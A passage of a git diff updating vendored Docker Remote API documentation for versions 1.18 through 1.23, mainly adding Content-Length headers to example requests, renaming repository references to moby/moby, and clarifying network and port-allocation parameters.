@@ -1056,6 +1070,8 @@ Remove the container `id` from the filesystem
         associated to the container. Default `false`.
 -   **force** - 1/True/true or 0/False/false, Kill then remove the container.
         Default `false`.
+-   **link** - 1/True/true or 0/False/false, Remove the specified
+        link associated to the container. Default `false`.
 
 **Status codes**:
 
@@ -1075,6 +1091,7 @@ Copy files or folders of container `id`
 
     POST /v1.18/containers/4fa6e0f0c678/copy HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Resource": "test.txt"
@@ -1192,6 +1209,7 @@ Build an image from a Dockerfile
 **Example request**:
 
     POST /v1.18/build HTTP/1.1
+    Content-Type: application/x-tar
 
     {% raw %}
     {{ TAR STREAM }}
@@ -1246,7 +1264,7 @@ or being killed.
 
 **Request Headers**:
 
--   **Content-type** – Set to `"application/tar"`.
+-   **Content-type** – Set to `"application/x-tar"`.
 -   **X-Registry-Config** – base64-encoded ConfigFile object
 
 **Status codes**:
@@ -1553,6 +1571,7 @@ Get the default username and email
 
     POST /v1.18/auth HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "username": "hannibal",
@@ -1698,6 +1717,7 @@ Create a new image from a container's changes
 
     POST /v1.18/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Hostname": "",
@@ -1862,6 +1882,7 @@ See the [image tarball format](#image-tarball-format) for more details.
 
     POST /v1.18/images/load
     Content-Type: application/x-tar
+    Content-Length: 12345
 
     Tarball in body
 
@@ -1905,6 +1926,7 @@ Sets up an exec instance in a running container `id`
 
     POST /v1.18/containers/e90e34656806/exec HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "AttachStdin": true,
@@ -1950,6 +1972,7 @@ interactive session with the `exec` command.
 
     POST /v1.18/exec/e90e34656806/start HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
      "Detach": false,
diff --git a/vendor/github.com/docker/docker/docs/api/v1.19.md b/vendor/github.com/docker/docker/docs/api/v1.19.md
index a1a7280d3a..f3d44555a5 100644
--- a/vendor/github.com/docker/docker/docs/api/v1.19.md
+++ b/vendor/github.com/docker/docker/docs/api/v1.19.md
@@ -7,8 +7,8 @@ redirect_from:
 - /reference/api/docker_remote_api_v1.19/
 ---
 
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
+<!-- This file is maintained within the moby/moby GitHub
+     repository at https://github.com/moby/moby/. Make all
      pull requests against that repo. If you see this file in
      another repository, consider it read-only there, as it will
      periodically be overwritten by the definitive file. Pull
@@ -23,8 +23,13 @@ redirect_from:
  - The API tends to be REST. However, for some complex commands, like `attach`
    or `pull`, the HTTP connection is hijacked to transport `stdout`,
    `stdin` and `stderr`.
- - When the client API version is newer than the daemon's, these calls return an HTTP
-   `400 Bad Request` error message.
+ - A `Content-Length` header should be present in `POST` requests to endpoints
+   that expect a body.
+ - To lock to a specific version of the API, you prefix the URL with the version
+   of the API to use. For example, `/v1.18/info`. If no version is included in
+   the URL, the maximum supported API version is used.
+ - If the API version specified in the URL is not supported by the daemon, a HTTP
+   `400 Bad Request` error message is returned.
 
 ## 2. Endpoints
 
@@ -133,6 +138,7 @@ Create a container
 
     POST /v1.19/containers/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
            "Hostname": "",
@@ -239,11 +245,11 @@ Create a container
 -   **ExposedPorts** - An object mapping ports to an empty object in the form of:
       `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
 -   **HostConfig**
-    -   **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms:
+    -   **Binds** – A list of bind mounts for this container. Each item is a string in one of these forms:
            + `host-src:container-dest` to bind-mount a host path into the
              container. Both `host-src`, and `container-dest` must be an
              _absolute_ path.
-           + `host-src:container-dest:ro` to make the bind-mount read-only
+           + `host-src:container-dest:ro` to make the bind mount read-only
              inside the container. Both `host-src`, and `container-dest` must be
              an _absolute_ path.
     -   **Links** - A list of links for the container. Each link entry should be
@@ -268,8 +274,14 @@ Create a container
           should map to. A JSON object in the form
           `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
           Take note that `port` is specified as a string and not an integer value.
-    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+    -   **PublishAllPorts** - Allocates an ephemeral host port for all of a container's
           exposed ports. Specified as a boolean value.
+
+          Ports are de-allocated when the container stops and allocated when the container starts.
+          The allocated port might be changed when restarting the container.
+
+          The port is selected from the ephemeral port range that depends on the kernel.
+          For example, on Linux the range is defined by `/proc/sys/net/ipv4/ip_local_port_range`.
     -   **Privileged** - Gives the container full access to the host. Specified as
           a boolean value.
     -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
@@ -727,7 +739,7 @@ This endpoint returns a live stream of a container's resource usage statistics.
          }
       }
 
-The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+The `precpu_stats` is the cpu statistic of *previous* read, which is used for calculating the cpu usage percent. It is not the exact copy of the `cpu_stats` field.
 
 **Query parameters**:
 
@@ -1095,6 +1107,8 @@ Remove the container `id` from the filesystem
         associated to the container. Default `false`.
 -   **force** - 1/True/true or 0/False/false, Kill then remove the container.
         Default `false`.
+-   **link** - 1/True/true or 0/False/false, Remove the specified
+        link associated to the container. Default `false`.
 
 **Status codes**:
 
@@ -1114,6 +1128,7 @@ Copy files or folders of container `id`
 
     POST /v1.19/containers/4fa6e0f0c678/copy HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Resource": "test.txt"
@@ -1236,6 +1251,7 @@ Build an image from a Dockerfile
 **Example request**:
 
     POST /v1.19/build HTTP/1.1
+    Content-Type: application/x-tar
 
     {% raw %}
     {{ TAR STREAM }}
@@ -1292,7 +1308,7 @@ or being killed.
 
 **Request Headers**:
 
--   **Content-type** – Set to `"application/tar"`.
+-   **Content-type** – Set to `"application/x-tar"`.
 -   **X-Registry-Config** – base64-encoded ConfigFile object
 
 **Status codes**:
@@ -1625,6 +1641,7 @@ Get the default username and email
 
     POST /v1.19/auth HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "username": "hannibal",
@@ -1774,6 +1791,7 @@ Create a new image from a container's changes
 
     POST /v1.19/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Hostname": "",
@@ -1942,6 +1960,7 @@ See the [image tarball format](#image-tarball-format) for more details.
 
     POST /v1.19/images/load
     Content-Type: application/x-tar
+    Content-Length: 12345
 
     Tarball in body
 
@@ -1985,6 +2004,7 @@ Sets up an exec instance in a running container `id`
 
     POST /v1.19/containers/e90e34656806/exec HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "AttachStdin": true,
@@ -2033,6 +2053,7 @@ interactive session with the `exec` command.
 
     POST /v1.19/exec/e90e34656806/start HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
      "Detach": false,
diff --git a/vendor/github.com/docker/docker/docs/api/v1.20.md b/vendor/github.com/docker/docker/docs/api/v1.20.md
index 2532c49950..199428121b 100644
--- a/vendor/github.com/docker/docker/docs/api/v1.20.md
+++ b/vendor/github.com/docker/docker/docs/api/v1.20.md
@@ -7,8 +7,8 @@ redirect_from:
 - /reference/api/docker_remote_api_v1.20/
 ---
 
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
+<!-- This file is maintained within the moby/moby GitHub
+     repository at https://github.com/moby/moby/. Make all
      pull requests against that repo. If you see this file in
      another repository, consider it read-only there, as it will
      periodically be overwritten by the definitive file. Pull
@@ -23,6 +23,13 @@ redirect_from:
  - The API tends to be REST. However, for some complex commands, like `attach`
    or `pull`, the HTTP connection is hijacked to transport `stdout`,
    `stdin` and `stderr`.
+ - A `Content-Length` header should be present in `POST` requests to endpoints
+   that expect a body.
+ - To lock to a specific version of the API, you prefix the URL with the version
+   of the API to use. For example, `/v1.18/info`. If no version is included in
+   the URL, the maximum supported API version is used.
+ - If the API version specified in the URL is not supported by the daemon, a HTTP
+   `400 Bad Request` error message is returned.
 
 ## 2. Endpoints
 
@@ -131,6 +138,7 @@ Create a container
 
     POST /v1.20/containers/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
            "Hostname": "",
@@ -239,11 +247,11 @@ Create a container
 -   **ExposedPorts** - An object mapping ports to an empty object in the form of:
       `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
 -   **HostConfig**
-    -   **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms:
+    -   **Binds** – A list of bind mounts for this container. Each item is a string in one of these forms:
            + `host-src:container-dest` to bind-mount a host path into the
              container. Both `host-src`, and `container-dest` must be an
              _absolute_ path.
-           + `host-src:container-dest:ro` to make the bind-mount read-only
+           + `host-src:container-dest:ro` to make the bind mount read-only
              inside the container. Both `host-src`, and `container-dest` must be
              an _absolute_ path.
     -   **Links** - A list of links for the container. Each link entry should be
@@ -269,8 +277,14 @@ Create a container
           should map to. A JSON object in the form
           `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
           Take note that `port` is specified as a string and not an integer value.
-    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+    -   **PublishAllPorts** - Allocates an ephemeral host port for all of a container's
           exposed ports. Specified as a boolean value.
+
+          Ports are de-allocated when the container stops and allocated when the container starts.
+          The allocated port might be changed when restarting the container.
+
+          The port is selected from the ephemeral port range that depends on the kernel.
+          For example, on Linux the range is defined by `/proc/sys/net/ipv4/ip_local_port_range`.
     -   **Privileged** - Gives the container full access to the host. Specified as
           a boolean value.
     -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
@@ -734,7 +748,7 @@ This endpoint returns a live stream of a container's resource usage statistics.
          }
       }
 
-The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+The `precpu_stats` is the cpu statistic of *previous* read, which is used for calculating the cpu usage percent. It is not the exact copy of the `cpu_stats` field.
 
 **Query parameters**:
 
@@ -1102,6 +1116,8 @@ Remove the container `id` from the filesystem
         associated to the container. Default `false`.
 -   **force** - 1/True/true or 0/False/false, Kill then remove the container.
         Default `false`.
+-   **link** - 1/True/true or 0/False/false, Remove the specified
+        link associated to the container. Default `false`.
 
 **Status codes**:
 
@@ -1123,6 +1139,7 @@ Copy files or folders of container `id`
 
     POST /v1.20/containers/4fa6e0f0c678/copy HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Resource": "test.txt"
@@ -1365,6 +1382,7 @@ Build an image from a Dockerfile
 **Example request**:
 
     POST /v1.20/build HTTP/1.1
+    Content-Type: application/x-tar
 
     {% raw %}
     {{ TAR STREAM }}
@@ -1425,7 +1443,7 @@ or being killed.
 
 **Request Headers**:
 
--   **Content-type** – Set to `"application/tar"`.
+-   **Content-type** – Set to `"application/x-tar"`.
 -   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
         object with the following structure:
 
@@ -1773,6 +1791,7 @@ Get the default username and email
 
     POST /v1.20/auth HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "username": "hannibal",
@@ -1923,6 +1942,7 @@ Create a new image from a container's changes
 
     POST /v1.20/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Hostname": "",
@@ -2097,6 +2117,7 @@ See the [image tarball format](#image-tarball-format) for more details.
 
     POST /v1.20/images/load
     Content-Type: application/x-tar
+    Content-Length: 12345
 
     Tarball in body
 
@@ -2140,6 +2161,7 @@ Sets up an exec instance in a running container `id`
 
     POST /v1.20/containers/e90e34656806/exec HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "AttachStdin": true,
@@ -2188,6 +2210,7 @@ interactive session with the `exec` command.
 
     POST /v1.20/exec/e90e34656806/start HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
      "Detach": false,
diff --git a/vendor/github.com/docker/docker/docs/api/v1.21.md b/vendor/github.com/docker/docker/docs/api/v1.21.md
index b4f54b7c44..3ecfd3b9f9 100644
--- a/vendor/github.com/docker/docker/docs/api/v1.21.md
+++ b/vendor/github.com/docker/docker/docs/api/v1.21.md
@@ -7,8 +7,8 @@ redirect_from:
 - /reference/api/docker_remote_api_v1.21/
 ---
 
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
+<!-- This file is maintained within the moby/moby GitHub
+     repository at https://github.com/moby/moby/. Make all
      pull requests against that repo. If you see this file in
      another repository, consider it read-only there, as it will
      periodically be overwritten by the definitive file. Pull
@@ -23,8 +23,13 @@ redirect_from:
  - The API tends to be REST. However, for some complex commands, like `attach`
    or `pull`, the HTTP connection is hijacked to transport `stdout`,
    `stdin` and `stderr`.
- - When the client API version is newer than the daemon's, these calls return an HTTP
-   `400 Bad Request` error message.
+ - A `Content-Length` header should be present in `POST` requests to endpoints
+   that expect a body.
+ - To lock to a specific version of the API, you prefix the URL with the version
+   of the API to use. For example, `/v1.18/info`. If no version is included in
+   the URL, the maximum supported API version is used.
+ - If the API version specified in the URL is not supported by the daemon, a HTTP
+   `400 Bad Request` error message is returned.
 
 ## 2. Endpoints
 
@@ -137,6 +142,7 @@ Create a container
 
     POST /v1.21/containers/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
            "Hostname": "",
@@ -255,7 +261,7 @@ Create a container
            + `host-src:container-dest` to bind-mount a host path into the
              container. Both `host-src`, and `container-dest` must be an
              _absolute_ path.
-           + `host-src:container-dest:ro` to make the bind-mount read-only
+           + `host-src:container-dest:ro` to make the bind mount read-only
              inside the container. Both `host-src`, and `container-dest` must be
              an _absolute_ path.
            + `volume-name:container-dest` to bind-mount a volume managed by a
@@ -288,8 +294,14 @@ Create a container
           should map to. A JSON object in the form
           `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
           Take note that `port` is specified as a string and not an integer value.
-    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+    -   **PublishAllPorts** - Allocates an ephemeral host port for all of a container's
           exposed ports. Specified as a boolean value.
+
+          Ports are de-allocated when the container stops and allocated when the container starts.
+          The allocated port might be changed when restarting the container.
+
+          The port is selected from the ephemeral port range that depends on the kernel.
+          For example, on Linux the range is defined by `/proc/sys/net/ipv4/ip_local_port_range`.
     -   **Privileged** - Gives the container full access to the host. Specified as
           a boolean value.
     -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
@@ -817,7 +829,7 @@ This endpoint returns a live stream of a container's resource usage statistics.
          }
       }
 
-The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+The `precpu_stats` is the cpu statistic of *previous* read, which is used for calculating the cpu usage percent. It is not the exact copy of the `cpu_stats` field.
 
 **Query parameters**:
 
@@ -1185,6 +1197,8 @@ Remove the container `id` from the filesystem
         associated to the container. Default `false`.
 -   **force** - 1/True/true or 0/False/false, Kill then remove the container.
         Default `false`.
+-   **link** - 1/True/true or 0/False/false, Remove the specified
+        link associated to the container. Default `false`.
 
 **Status codes**:
 
@@ -1206,6 +1220,7 @@ Copy files or folders of container `id`
 
     POST /v1.21/containers/4fa6e0f0c678/copy HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Resource": "test.txt"
@@ -1448,6 +1463,7 @@ Build an image from a Dockerfile
 **Example request**:
 
     POST /v1.21/build HTTP/1.1
+    Content-Type: application/x-tar
 
     {% raw %}
     {{ TAR STREAM }}
@@ -1514,7 +1530,7 @@ or being killed.
 
 **Request Headers**:
 
--   **Content-type** – Set to `"application/tar"`.
+-   **Content-type** – Set to `"application/x-tar"`.
 -   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
         object with the following structure:
 
@@ -1926,6 +1942,7 @@ Get the default username and email
 
     POST /v1.21/auth HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "username": "hannibal",
@@ -2078,6 +2095,7 @@ Create a new image from a container's changes
 
     POST /v1.21/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Hostname": "",
@@ -2253,6 +2271,7 @@ See the [image tarball format](#image-tarball-format) for more details.
 
     POST /v1.21/images/load
     Content-Type: application/x-tar
+    Content-Length: 12345
 
     Tarball in body
 
@@ -2296,6 +2315,7 @@ Sets up an exec instance in a running container `id`
 
     POST /v1.21/containers/e90e34656806/exec HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "AttachStdin": true,
@@ -2348,6 +2368,7 @@ interactive session with the `exec` command.
 
     POST /v1.21/exec/e90e34656806/start HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
      "Detach": false,
@@ -2575,6 +2596,7 @@ Create a volume
 
     POST /v1.21/volumes/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "Name": "tardis"
@@ -2736,7 +2758,9 @@ Content-Type: application/json
 
 #### Inspect network
 
-`GET /networks/<network-id>`
+`GET /networks/(id or name)`
+
+Return low-level information on the network `id`
 
 **Example request**:
 
@@ -2784,6 +2808,7 @@ Content-Type: application/json
 
 -   **200** - no error
 -   **404** - network not found
+-   **500** - server error
 
 #### Create a network
 
@@ -2796,6 +2821,7 @@ Create a network
 ```
 POST /v1.21/networks/create HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Name":"isolated_nw",
@@ -2835,7 +2861,12 @@ Content-Type: application/json
 **JSON parameters**:
 
 - **Name** - The new network's name. this is a mandatory field
-- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`
+- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`.
+    Since Network is primarily keyed based on a random ID and not on the name, 
+    and network name is strictly a user-friendly alias to the network which is uniquely identified using ID, 
+    there is no guaranteed way to check for duplicates across a cluster of docker hosts. 
+    This parameter CheckDuplicate is there to provide a best effort checking of any networks 
+    which has the same name but it is not guaranteed to catch all name collisions.
 - **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver
 - **IPAM** - Optional custom IP scheme for the network
   - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver
@@ -2845,7 +2876,7 @@ Content-Type: application/json
 
 #### Connect a container to a network
 
-`POST /networks/(id)/connect`
+`POST /networks/(id or name)/connect`
 
 Connect a container to a network
 
@@ -2854,6 +2885,7 @@ Connect a container to a network
 ```
 POST /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Container":"3613f73ba0e4"
@@ -2876,7 +2908,7 @@ Content-Type: application/json
 
 #### Disconnect a container from a network
 
-`POST /networks/(id)/disconnect`
+`POST /networks/(id or name)/disconnect`
 
 Disconnect a container from a network
 
@@ -2885,6 +2917,7 @@ Disconnect a container from a network
 ```
 POST /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Container":"3613f73ba0e4"
@@ -2907,7 +2940,7 @@ Content-Type: application/json
 
 #### Remove a network
 
-`DELETE /networks/(id)`
+`DELETE /networks/(id or name)`
 
 Instruct the driver to remove the network (`id`).
 
@@ -2922,6 +2955,7 @@ Instruct the driver to remove the network (`id`).
 **Status codes**:
 
 -   **200** - no error
+-   **403** - operation not supported for pre-defined networks
 -   **404** - no such network
 -   **500** - server error
 
diff --git a/vendor/github.com/docker/docker/docs/api/v1.22.md b/vendor/github.com/docker/docker/docs/api/v1.22.md
index e94081344c..fc19c9f0af 100644
--- a/vendor/github.com/docker/docker/docs/api/v1.22.md
+++ b/vendor/github.com/docker/docker/docs/api/v1.22.md
@@ -7,8 +7,8 @@ redirect_from:
 - /reference/api/docker_remote_api_v1.22/
 ---
 
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
+<!-- This file is maintained within the moby/moby GitHub
+     repository at https://github.com/moby/moby/. Make all
      pull requests against that repo. If you see this file in
      another repository, consider it read-only there, as it will
      periodically be overwritten by the definitive file. Pull
@@ -23,6 +23,13 @@ redirect_from:
  - The API tends to be REST. However, for some complex commands, like `attach`
    or `pull`, the HTTP connection is hijacked to transport `stdout`,
    `stdin` and `stderr`.
+ - A `Content-Length` header should be present in `POST` requests to endpoints
+   that expect a body.
+ - To lock to a specific version of the API, you prefix the URL with the version
+   of the API to use. For example, `/v1.18/info`. If no version is included in
+   the URL, the maximum supported API version is used.
+ - If the API version specified in the URL is not supported by the daemon, a HTTP
+   `400 Bad Request` error message is returned.
 
 ## 2. Endpoints
 
@@ -220,6 +227,7 @@ Create a container
 
     POST /v1.22/containers/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
            "Hostname": "",
@@ -357,7 +365,7 @@ Create a container
            + `host-src:container-dest` to bind-mount a host path into the
              container. Both `host-src`, and `container-dest` must be an
              _absolute_ path.
-           + `host-src:container-dest:ro` to make the bind-mount read-only
+           + `host-src:container-dest:ro` to make the bind mount read-only
              inside the container. Both `host-src`, and `container-dest` must be
              an _absolute_ path.
            + `volume-name:container-dest` to bind-mount a volume managed by a
@@ -388,7 +396,7 @@ Create a container
         `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]"`
     -   **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of:	`"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
         `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
-    -   **BlkioDeviceWiiteIOps** - Limit write rate (IO per second) to a device in the form of:	`"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+    -   **BlkioDeviceWriteIOps** - Limit write rate (IO per second) to a device in the form of:	`"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
         `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
     -   **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
     -   **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
@@ -400,8 +408,14 @@ Create a container
           should map to. A JSON object in the form
           `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
           Take note that `port` is specified as a string and not an integer value.
-    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+    -   **PublishAllPorts** - Allocates an ephemeral host port for all of a container's
           exposed ports. Specified as a boolean value.
+
+          Ports are de-allocated when the container stops and allocated when the container starts.
+          The allocated port might be changed when restarting the container.
+
+          The port is selected from the ephemeral port range that depends on the kernel.
+          For example, on Linux the range is defined by `/proc/sys/net/ipv4/ip_local_port_range`.
     -   **Privileged** - Gives the container full access to the host. Specified as
           a boolean value.
     -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
@@ -943,7 +957,7 @@ This endpoint returns a live stream of a container's resource usage statistics.
          }
       }
 
-The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+The `precpu_stats` is the cpu statistic of *previous* read, which is used for calculating the cpu usage percent. It is not the exact copy of the `cpu_stats` field.
 
 **Query parameters**:
 
@@ -1108,7 +1122,7 @@ Update resource configs of one or more containers.
          "Memory": 314572800,
          "MemorySwap": 514288000,
          "MemoryReservation": 209715200,
-         "KernelMemory": 52428800,
+         "KernelMemory": 52428800
        }
 
 **Example response**:
@@ -1364,6 +1378,8 @@ Remove the container `id` from the filesystem
         associated to the container. Default `false`.
 -   **force** - 1/True/true or 0/False/false, Kill then remove the container.
         Default `false`.
+-   **link** - 1/True/true or 0/False/false, Remove the specified
+        link associated to the container. Default `false`.
 
 **Status codes**:
 
@@ -1385,6 +1401,7 @@ Copy files or folders of container `id`
 
     POST /v1.22/containers/4fa6e0f0c678/copy HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Resource": "test.txt"
@@ -1627,6 +1644,7 @@ Build an image from a Dockerfile
 **Example request**:
 
     POST /v1.22/build HTTP/1.1
+    Content-Type: application/x-tar
 
     {% raw %}
     {{ TAR STREAM }}
@@ -1694,7 +1712,7 @@ or being killed.
 
 **Request Headers**:
 
--   **Content-type** – Set to `"application/tar"`.
+-   **Content-type** – Set to `"application/x-tar"`.
 -   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
         object with the following structure:
 
@@ -2143,6 +2161,7 @@ Get the default username and email
 
     POST /v1.22/auth HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "username": "hannibal",
@@ -2312,6 +2331,7 @@ Create a new image from a container's changes
 
     POST /v1.22/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Hostname": "",
@@ -2644,6 +2664,7 @@ See the [image tarball format](#image-tarball-format) for more details.
 
     POST /v1.22/images/load
     Content-Type: application/x-tar
+    Content-Length: 12345
 
     Tarball in body
 
@@ -2687,6 +2708,7 @@ Sets up an exec instance in a running container `id`
 
     POST /v1.22/containers/e90e34656806/exec HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "AttachStdin": true,
@@ -2743,6 +2765,7 @@ interactive session with the `exec` command.
 
     POST /v1.22/exec/e90e34656806/start HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
      "Detach": false,
@@ -2888,6 +2911,7 @@ Create a volume
 
     POST /v1.22/volumes/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "Name": "tardis"
@@ -3052,7 +3076,9 @@ Content-Type: application/json
 
 #### Inspect network
 
-`GET /networks/<network-id>`
+`GET /networks/(id or name)`
+
+Return low-level information on the network `id`
 
 **Example request**:
 
@@ -3105,6 +3131,7 @@ Content-Type: application/json
 
 -   **200** - no error
 -   **404** - network not found
+-   **500** - server error
 
 #### Create a network
 
@@ -3117,6 +3144,7 @@ Create a network
 ```
 POST /v1.22/networks/create HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Name":"isolated_nw",
@@ -3164,7 +3192,12 @@ Content-Type: application/json
 **JSON parameters**:
 
 - **Name** - The new network's name. this is a mandatory field
-- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`
+- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`.
+    Since Network is primarily keyed based on a random ID and not on the name, 
+    and network name is strictly a user-friendly alias to the network 
+    which is uniquely identified using ID, there is no guaranteed way to check for duplicates. 
+    This parameter CheckDuplicate is there to provide a best effort checking of any networks 
+    which has the same name but it is not guaranteed to catch all name collisions.
 - **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver
 - **IPAM** - Optional custom IP scheme for the network
   - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver
@@ -3175,7 +3208,7 @@ Content-Type: application/json
 
 #### Connect a container to a network
 
-`POST /networks/(id)/connect`
+`POST /networks/(id or name)/connect`
 
 Connect a container to a network
 
@@ -3184,6 +3217,7 @@ Connect a container to a network
 ```
 POST /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Container":"3613f73ba0e4",
@@ -3212,7 +3246,7 @@ Content-Type: application/json
 
 #### Disconnect a container from a network
 
-`POST /networks/(id)/disconnect`
+`POST /networks/(id or name)/disconnect`
 
 Disconnect a container from a network
 
@@ -3221,6 +3255,7 @@ Disconnect a container from a network
 ```
 POST /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Container":"3613f73ba0e4",
@@ -3245,7 +3280,7 @@ Content-Type: application/json
 
 #### Remove a network
 
-`DELETE /networks/(id)`
+`DELETE /networks/(id or name)`
 
 Instruct the driver to remove the network (`id`).
 
@@ -3260,6 +3295,7 @@ Instruct the driver to remove the network (`id`).
 **Status codes**:
 
 -   **200** - no error
+-   **403** - operation not supported for pre-defined networks
 -   **404** - no such network
 -   **500** - server error
 
diff --git a/vendor/github.com/docker/docker/docs/api/v1.23.md b/vendor/github.com/docker/docker/docs/api/v1.23.md
index e23811bb95..218734aea6 100644
--- a/vendor/github.com/docker/docker/docs/api/v1.23.md
+++ b/vendor/github.com/docker/docker/docs/api/v1.23.md
@@ -7,8 +7,8 @@ redirect_from:
 - /reference/api/docker_remote_api_v1.23/
 ---
 
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
+<!-- This file is maintained within the moby/moby GitHub
+     repository at https://github.com/moby/moby/. Make all
      pull requests against that repo. If you see this file in
      another repository, consider it read-only there, as it will
      periodically be overwritten by the definitive file. Pull
@@ -23,8 +23,13 @@ redirect_from:
  - The API tends to be REST. However, for some complex commands, like `attach`
    or `pull`, the HTTP connection is hijacked to transport `stdout`,
    `stdin` and `stderr`.
- - When the client API version is newer than the daemon's, these calls return an HTTP
-   `400 Bad Request` error message.
+ - A `Content-Length` header should be present in `POST` requests to endpoints
+   that expect a body.
+ - To lock to a specific version of the API, you prefix the URL with the version
+   of the API to use. For example, `/v1.18/info`. If no version is included in
+   the URL, the maximum supported API version is used.
+ - If the API version specified in the URL is not supported by the daemon, a HTTP
+   `400 Bad Request` error message is returned.
 
 ## 2. Endpoints
 
@@ -53,7 +58,7 @@ List containers
